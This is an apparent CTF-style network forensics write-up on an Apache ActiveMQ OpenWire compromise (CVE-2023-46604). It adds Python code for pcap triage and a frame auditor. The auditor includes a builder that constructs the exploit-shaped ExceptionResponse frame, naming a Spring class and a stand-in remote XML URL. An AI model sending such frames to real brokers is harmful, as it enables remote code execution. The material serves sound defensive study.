Category: Network Forensics
LEVEL : Medium
Challenge Download Link
Instructions:
- Uncompress the lab (pass: cyberdefenders.org)
Scenario:
During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.
Tools:
- Wireshark
Q1-By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?
- First, list every conversation that involves our server.
- Go to Statistics > Conversations > IPv4 :
- From the image above, three conversations involve a single IP address (134.209.197.3), which is our server.
- One of them carries 4867 packets (about 5 MiB) between our server and an external address; by far the busiest external peer, this is the C2 server:
THE ANSWER : 146.190.21.92
Q2-Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?
- The challenge name suggests the attacker abused the OpenWire protocol to exploit the server.
- So go to packet 5 and check the destination port number:
- Or just look up the default OpenWire listener port:
THE ANSWER : 61616
Q3-Following up on the previous question, what is the name of the service found to be vulnerable?
- An easy one: search for OpenWire protocol exploits:
- Or reuse what Q2 already told us (61616 is the default OpenWire port of the ActiveMQ broker):
THE ANSWER : Apache ActiveMQ
Q4-The attacker’s infrastructure often involves multiple components. What is the IP of the second C2 server?
- Back to the conversations with our server:
Statistics > Conversations > IPv4
- There are two more conversations with our server, with 128.199.52.72 and 84.239.49.16.
- So I filtered the capture on the first address:
ip.addr==128.199.52.72
- As you can see, our server requests a resource from that external address (an outbound HTTP GET, not an inbound connection).
- To confirm, go to packet 34 and follow the TCP stream:
TCP Stream eq 3
- The response body starts with the ELF magic bytes (7f 45 4c 46, i.e. `\x7fELF`), the header of a Linux executable, so I was sure this is the second C2 server, the one hosting the payload.
THE ANSWER : 128.199.52.72
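The two checks used for Q1 and Q4 above, done without Wireshark, as an added example that is not part of the original writeup: `conversations()` reproduces the tally shown in Statistics > Conversations > IPv4 (packets and frame bytes per address pair), and `elf_senders()` flags TCP segments whose body begins with the ELF magic. It uses only the Python standard library. `SAMPLE_PCAP` is a constructed in-memory capture of a few tiny frames that reuse the addresses named in the writeup; it is not the lab file, and the URL path and payload bytes in it are made up.

```python
"""Added example (not part of the original writeup): the two checks behind
Q1 and Q4, done without Wireshark.  conversations() reproduces the tally in
Statistics > Conversations > IPv4; elf_senders() flags TCP segments whose
body begins with the ELF magic, the clue used to spot the payload download.
Standard library only.  SAMPLE_PCAP at the bottom is CONSTRUCTED in memory
(a few tiny frames); it is not the lab capture."""
import struct
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4
PCAP_MAGIC_BE = 0xD4C3B2A1
LINKTYPE_ETHERNET = 1
ELF_MAGIC = b"\x7fELF"


def iter_frames(data):
    """Yield each captured frame from a classic libpcap file (either byte order)."""
    magic = struct.unpack("<I", data[:4])[0]
    end = "<" if magic == PCAP_MAGIC_LE else ">" if magic == PCAP_MAGIC_BE else None
    if end is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(end + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_ipv4(frame):
    """Return (src, dst, tcp_payload) for an Ethernet/IPv4 frame, else None.
    tcp_payload is None for non-TCP packets."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[16:18])[0]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    payload = None
    if frame[23] == 6:                                  # protocol 6 = TCP
        tcp = frame[14 + ihl:14 + total_len]
        payload = tcp[(tcp[12] >> 4) * 4:]              # skip TCP header (data offset)
    return src, dst, payload


def conversations(pcap):
    """Packets and bytes per unordered address pair, as Wireshark's IPv4 tab shows."""
    stats = defaultdict(lambda: {"packets": 0, "bytes": 0})
    for frame in iter_frames(pcap):
        p = parse_ipv4(frame)
        if p:
            key = tuple(sorted(p[:2]))
            stats[key]["packets"] += 1
            stats[key]["bytes"] += len(frame)
    return dict(stats)


def elf_senders(pcap):
    """(src, dst) pairs where a TCP segment body starts with an ELF header.
    The body is whatever follows an HTTP header block, or the whole payload."""
    hits = set()
    for frame in iter_frames(pcap):
        p = parse_ipv4(frame)
        if p and p[2]:
            body = p[2].split(b"\r\n\r\n", 1)[-1]
            if body.startswith(ELF_MAGIC):
                hits.add((p[0], p[1]))
    return hits


def build_frame(src, dst, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame for test data (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split("."))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap container."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", i, 0, len(f), len(f)) + f)
    return b"".join(out)


# CONSTRUCTED traffic using the addresses named in the writeup: three
# OpenWire-port frames from the first C2, an HTTP fetch of an ELF from the
# second host, and one unrelated frame from the third address.
SERVER = "134.209.197.3"
SAMPLE_PCAP = build_pcap(
    [build_frame("146.190.21.92", SERVER, 40000, 61616, b"\x00\x00\x00\x08" + b"A" * 8)] * 3
    + [build_frame(SERVER, "128.199.52.72", 50000, 80,
                   b"GET /file HTTP/1.1\r\nHost: 128.199.52.72\r\n\r\n"),
       build_frame("128.199.52.72", SERVER, 80, 50000,
                   b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                   + ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9),
       build_frame("84.239.49.16", SERVER, 41000, 61616, b"\x00\x00\x00\x04ping")])

if __name__ == "__main__":
    for (a, b), s in sorted(conversations(SAMPLE_PCAP).items(), key=lambda kv: -kv[1]["packets"]):
        print(f"{a:>15} <-> {b:<15} {s['packets']:>5} pkts {s['bytes']:>7} bytes")
    print("ELF seen from:", elf_senders(SAMPLE_PCAP))
```

To run it on the real capture, read the file into `pcap` and pass it to the same two functions; note that `elf_senders()` looks at individual segments, so an ELF whose header is split across a segment boundary or delivered over a reassembled stream would need TCP reassembly first, which is what Follow TCP Stream does for you in Wireshark.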
Q5-Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?
- Now go to packet 11 and follow the TCP stream:
TCP Stream eq 1
- From the stream we can see that the attacker dropped a reverse shell into the /tmp/ directory:
THE ANSWER : docker
Q6-What Java class was invoked by the XML file to run the exploit?
- Again, go to packet 11 and follow the TCP stream; the XML fetched by the server defines a bean of this class:
THE ANSWER : java.lang.ProcessBuilder
Q7-To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?
- Just search for "Apache ActiveMQ OpenWire RCE":
THE ANSWER : CVE-2023-46604
Q8-What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)
This question took me about 20 years to solve 😂😃😃.
- After reading many articles and resources, I found these two useful. Both walk through the vulnerable method: it takes the class name and message from a remote ExceptionResponse and instantiates that class through `Class.forName(...).getConstructor(String.class).newInstance(message)` without checking that it is actually a Throwable, which is the check the fix added.
Apache ActiveMQ Remote Code Execution (CVE_2023_46604) | SonicWall
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability…
Apache ActiveMQ RCE (CVE-2023–46604) — vsociety
In essence, CVE-2023–46604 poses a severe risk, as it enables remote attackers to execute arbitrary commands…
Please READ THOSE ARTICLES AND DO NOT JUST COPY THE ANSWER.
From the first article:
From the second article:
THE ANSWER : BaseDataStreamMarshaller.createThrowable
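As an added example that is neither the writeup's nor ActiveMQ's own code, here is the frame that reaches `BaseDataStreamMarshaller.createThrowable` (Q8) decoded field by field, followed by the check the CVE-2023-46604 fix introduced: the class named in the exception must be a Throwable. It assumes a size-prefixed, loose-encoded ExceptionResponse (data structure type 31), the encoding in force before the peers negotiate WireFormatInfo, with stack traces disabled. The frames built at the bottom are constructed: the benign one is an ordinary broker error, the suspicious one names the Spring context class that the two articles above describe, with the message field carrying the URL of the remote XML that, in this lab, instantiated `java.lang.ProcessBuilder` (Q6). The host 192.0.2.10 and the `KNOWN_THROWABLES` allowlist are illustrative assumptions.

```python
"""Added example (not code from the writeup or from ActiveMQ): decode the
OpenWire frame that reaches createThrowable (Q8) and apply the check the
CVE-2023-46604 fix introduced, that the named class must be a Throwable.
Assumes a size-prefixed, loose-encoded ExceptionResponse (data structure
type 31), the encoding in force before the peers negotiate WireFormatInfo,
with stack traces disabled.  The frames built at the bottom are CONSTRUCTED;
the host 192.0.2.10 and the class allowlist are illustrative."""
import struct

EXCEPTION_RESPONSE = 31          # ExceptionResponse.DATA_STRUCTURE_TYPE

# Stand-in for Throwable.class.isAssignableFrom(clazz) outside a JVM (assumption:
# a real deployment would consult the class hierarchy, not a fixed list).
KNOWN_THROWABLES = {
    "java.lang.Throwable", "java.lang.Exception", "java.lang.RuntimeException",
    "java.lang.IllegalStateException", "java.lang.SecurityException",
    "javax.jms.JMSException", "javax.jms.JMSSecurityException",
}


class DataInput:
    """Just enough of java.io.DataInput to walk the loose encoding."""

    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def take(self, n):
        chunk = self.buf[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated frame")
        self.pos += n
        return chunk

    def read_byte(self):
        return self.take(1)[0]

    def read_boolean(self):
        return self.read_byte() != 0

    def read_int(self):
        return struct.unpack("!i", self.take(4))[0]

    def read_utf(self):              # 2-byte length, then the string bytes
        n = struct.unpack("!H", self.take(2))[0]
        return self.take(n).decode("utf-8")

    def read_nullable_utf(self):     # BaseDataStreamMarshaller.looseUnmarshalString
        return self.read_utf() if self.read_boolean() else None


def parse_exception_response(frame):
    """Walk the marshaller chain: size prefix, type byte, BaseCommand fields,
    Response.correlationId, then the Throwable's class name and message, i.e.
    exactly the two strings createThrowable(className, message) receives."""
    r = DataInput(frame)
    if r.read_int() != len(frame) - 4:
        raise ValueError("size prefix does not match frame length")
    if r.read_byte() != EXCEPTION_RESPONSE:
        raise ValueError("not an ExceptionResponse")
    info = {"command_id": r.read_int()}                 # BaseCommandMarshaller
    info["response_required"] = r.read_boolean()
    info["correlation_id"] = r.read_int()               # ResponseMarshaller
    if r.read_boolean():                                # looseUnmarsalThrowable: non-null?
        info["class_name"] = r.read_nullable_utf()
        info["message"] = r.read_nullable_utf()
    else:
        info["class_name"] = info["message"] = None
    return info


def audit_frame(frame):
    """'ok' when the exception class is absent or a known Throwable; otherwise
    'suspicious: <class>', the case the patched createThrowable now rejects."""
    cls = parse_exception_response(frame)["class_name"]
    if cls is None or cls in KNOWN_THROWABLES:
        return "ok"
    return "suspicious: " + cls


def build_exception_response(class_name, message, command_id=0, correlation_id=0):
    """Encode a frame in the same layout, to produce test input."""
    body = bytes([EXCEPTION_RESPONSE]) + struct.pack("!i", command_id) + b"\x00"
    body += struct.pack("!i", correlation_id) + b"\x01"      # exception present
    for s in (class_name, message):
        raw = s.encode("utf-8")
        body += b"\x01" + struct.pack("!H", len(raw)) + raw  # non-null string
    return struct.pack("!i", len(body)) + body


# CONSTRUCTED frames: a legitimate broker error, and one naming the Spring
# context class the public analyses of CVE-2023-46604 describe, with the
# message field carrying the URL of a remote XML bean definition.
BENIGN_FRAME = build_exception_response("javax.jms.JMSSecurityException",
                                        "User is not authorized", 7, 3)
SUSPICIOUS_FRAME = build_exception_response(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://192.0.2.10/poc.xml")

if __name__ == "__main__":
    for f in (BENIGN_FRAME, SUSPICIOUS_FRAME):
        print(parse_exception_response(f), "->", audit_frame(f))
```

On a real capture you would feed the reassembled payload of the stream to port 61616 to `parse_exception_response()`; the class name and URL it returns are the two strings to pivot on when hunting for the follow-up download. Two caveats: after WireFormatInfo negotiation ActiveMQ normally switches to tight encoding (a BooleanStream precedes the fields), which this decoder does not handle, and the allowlist is only a stand-in for the JVM's `isAssignableFrom` check, so an unfamiliar but legitimate exception class would show up as suspicious.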
THE END
BY : AHMED NASSER
FOLLOW FOR MORE 😅😎